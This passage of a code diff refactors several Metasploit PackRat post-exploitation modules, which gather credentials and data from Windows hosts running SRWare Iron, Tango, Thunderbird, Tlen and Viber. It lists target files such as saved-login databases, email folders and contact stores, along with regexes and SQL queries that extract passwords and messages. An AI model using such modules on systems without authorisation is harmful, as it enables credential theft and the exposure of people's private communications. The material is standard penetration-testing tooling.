+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Srware credentials on a windows remote host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -104,8 +113,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -116,11 +126,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/srware.rb
+++ b/modules/post/windows/gather/credentials/srware.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/tango.rb
+++ b/modules/post/windows/gather/credentials/tango.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/tango.rb
+++ b/modules/post/windows/gather/credentials/tango.rb
@@ -10,87 +10,96 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'tango',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'database',
+          path: 'LocalAppData',
+          dir: 'tango',
+          artifact_file_name: 'contacts.dat',
+          description: 'Tango contact names',
+          credential_type: 'dat'
+        },
+        {
+          filetypes: 'software_version',
+          path: 'LocalAppData',
+          dir: 'tango',
+          artifact_file_name: 'install.log',
+          description: 'Tango Version',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'userinfo',
+          path: 'LocalAppData',
+          dir: 'tango',
+          artifact_file_name: 'userinfo1.xml',
+          description: 'User info',
+          credential_type: 'xml',
+          xml_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              xml: [
+                '//firstname',
+                '//lastname',
+                '//phonenumber',
+                '//email'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Tango credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Tango credentials on a windows remote host. Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "tango",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "database",
-                              "path": "LocalAppData",
-                              "dir": "tango",
-                              "artifact_file_name": "contacts.dat",
-                              "description": "Tango contact names",
-                              "credential_type": "dat"
-                            },
-                            {
-                              "filetypes": "software_version",
-                              "path": "LocalAppData",
-                              "dir": "tango",
-                              "artifact_file_name": "install.log",
-                              "description": "Tango Version",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "userinfo",
-                              "path": "LocalAppData",
-                              "dir": "tango",
-                              "artifact_file_name": "userinfo1.xml",
-                              "description": "User info",
-                              "credential_type": "xml",
-                              "xml_search": [
-                              {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "xml": [
-                                   "//firstname",
-                                   "//lastname",
-                                   "//phonenumber",
-                                   "//email"
-                                  ]
-                                  }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Tango credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Tango credentials on a windows remote host. Tango is a third-party, cross platform messaging application software for smartphones developed by TangoME, Inc.t
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -98,8 +107,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -110,11 +120,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/thunderbird.rb
+++ b/modules/post/windows/gather/credentials/thunderbird.rb
@@ -218,7 +218,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/thunderbird.rb
+++ b/modules/post/windows/gather/credentials/thunderbird.rb
@@ -10,198 +10,207 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'thunderbird',
+      app_category: 'emails',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'signons.sqlite',
+          description: "Thunderbird's saved Username and Passwords",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'logins',
+              sql_column: 'username_value, action_url'
+            }
+          ]
+        },
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'key3.db',
+          description: "Thunderbird's saved Username and Passwords",
+          credential_type: 'binary'
+        },
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'cert8.db',
+          description: "Thunderbird's saved Username and Passwords",
+          credential_type: 'binary'
+        },
+        {
+          filetypes: 'received_emails',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'Inbox',
+          description: "Thunderbird's received emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'sent_emails',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'Sent',
+          description: "Thunderbird's sent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'deleted_emails',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'Trash',
+          description: "Thunderbird's Deleted emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'draft_emails',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'Drafts',
+          description: "Thunderbird's unsent emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'database',
+          path: 'AppData',
+          dir: 'Thunderbird',
+          artifact_file_name: 'global-messages-db.sqlite',
+          description: 'emails info',
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: 'Database Commands which exports Contacts',
+              sql_table: 'contacts',
+              sql_column: 'name'
+            },
+            {
+              sql_description: 'Conversation Subject',
+              sql_table: 'conversations',
+              sql_column: 'subject'
+            },
+            {
+              sql_description: 'email address identities',
+              sql_table: 'identities',
+              sql_column: 'value'
+            },
+            {
+              sql_description: "Email's",
+              sql_table: 'messagesText_content',
+              sql_column: 'c3author, c4recipients, c1subject, c0body'
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Chrome credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for thunderbird credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "thunderbird",
-                          "app_category": "emails",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "signons.sqlite",
-                              "description": "Thunderbird's saved Username and Passwords",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "logins",
-                                  "sql_column": "username_value, action_url"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "key3.db",
-                              "description": "Thunderbird's saved Username and Passwords",
-                              "credential_type": "binary"
-                            },
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "cert8.db",
-                              "description": "Thunderbird's saved Username and Passwords",
-                              "credential_type": "binary"
-                            },
-                            {
-                              "filetypes": "received_emails",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "Inbox",
-                              "description": "Thunderbird's received emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "sent_emails",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "Sent",
-                              "description": "Thunderbird's sent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "deleted_emails",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "Trash",
-                              "description": "Thunderbird's Deleted emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "draft_emails",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "Drafts",
-                              "description": "Thunderbird's unsent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "database",
-                              "path": "AppData",
-                              "dir": "Thunderbird",
-                              "artifact_file_name": "global-messages-db.sqlite",
-                              "description": "emails info",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Contacts",
-                                  "sql_table": "contacts",
-                                  "sql_column": "name"
-                                },
-                                {
-                                  "sql_description": "Conversation Subject",
-                                  "sql_table": "conversations",
-                                  "sql_column": "subject"
-                                },
-                                {
-                                  "sql_description": "email address identities",
-                                  "sql_table": "identities",
-                                  "sql_column": "value"
-                                },
-                                {
-                                  "sql_description": "Email's",
-                                  "sql_table": "messagesText_content",
-                                  "sql_column": "c3author, c4recipients, c1subject, c0body"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Chrome credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for thunderbird credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -209,8 +218,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -221,11 +231,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/tlen.rb
+++ b/modules/post/windows/gather/credentials/tlen.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/tlen.rb
+++ b/modules/post/windows/gather/credentials/tlen.rb
@@ -10,66 +10,75 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'tlen',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Tlen',
+          artifact_file_name: 'Profiles.dat',
+          description: 'Tlen.pl saved usernames and passwords',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'chat_logs',
+          path: 'AppData',
+          dir: 'Tlen.pl',
+          artifact_file_name: '*.jpg',
+          description: 'Tlen.pl sent images'
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Tlen credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Tlen credentials on a windows remote host. Tlen is a free Polish instant messaging service.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "tlen",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Tlen",
-                              "artifact_file_name": "Profiles.dat",
-                              "description": "Tlen.pl saved usernames and passwords",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "chat_logs",
-                              "path": "AppData",
-                              "dir": "Tlen.pl",
-                              "artifact_file_name": "*.jpg",
-                              "description": "Tlen.pl sent images"
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Tlen credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Tlen credentials on a windows remote host. Tlen is a free Polish instant messaging service.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -77,8 +86,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -89,11 +99,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/viber.rb
+++ b/modules/post/windows/gather/credentials/viber.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/viber.rb
+++ b/modules/post/windows/gather/credentials/viber.rb
@@ -10,57 +10,66 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'viber',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'database',
+          path: 'AppData',
+          dir: 'ViberPC',
+          artifact_file_name: 'viber.db',
+          description: "All Contact's names, numbers, sms are saved from user's mobile",
+          credential_type: 'database'
+        },
+        {
+          filetypes: 'thumbs',
+          path: 'AppData',
+          dir: 'ViberPC',
+          artifact_file_name: 'Thumbs.db',
+          description: "Viber's Contact's profile images in Thumbs.db file",
+          credential_type: 'image'
+        },
+        {
+          filetypes: 'images',
+          path: 'AppData',
+          dir: 'ViberPC',
+          artifact_file_name: '*.jpg',
+          description: 'Collects all images of contacts and sent recieved',
+          credential_type: 'image'
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Viber credential gatherer',
-                      'Description' => %q{
-         PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for credentials in Viber desktop application on a windows remote host. Viber is a cross-platform voice over IP and instant messaging software application.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "viber",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "database",
-                              "path": "AppData",
-                              "dir": "ViberPC",
-                              "artifact_file_name": "viber.db",
-                              "description": "All Contact's names, numbers, sms are saved from user's mobile",
-                              "credential_type": "database"
-                            },
-                            {
-                              "filetypes": "thumbs",
-                              "path": "AppData",
-                              "dir": "ViberPC",
-                              "artifact_file_name": "Thumbs.db",
-                              "description": "Viber's Contact's profile images in Thumbs.db file",
-                              "credential_type": "image"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "AppData",
-                              "dir": "ViberPC",
-                              "artifact_file_name": "*.jpg",
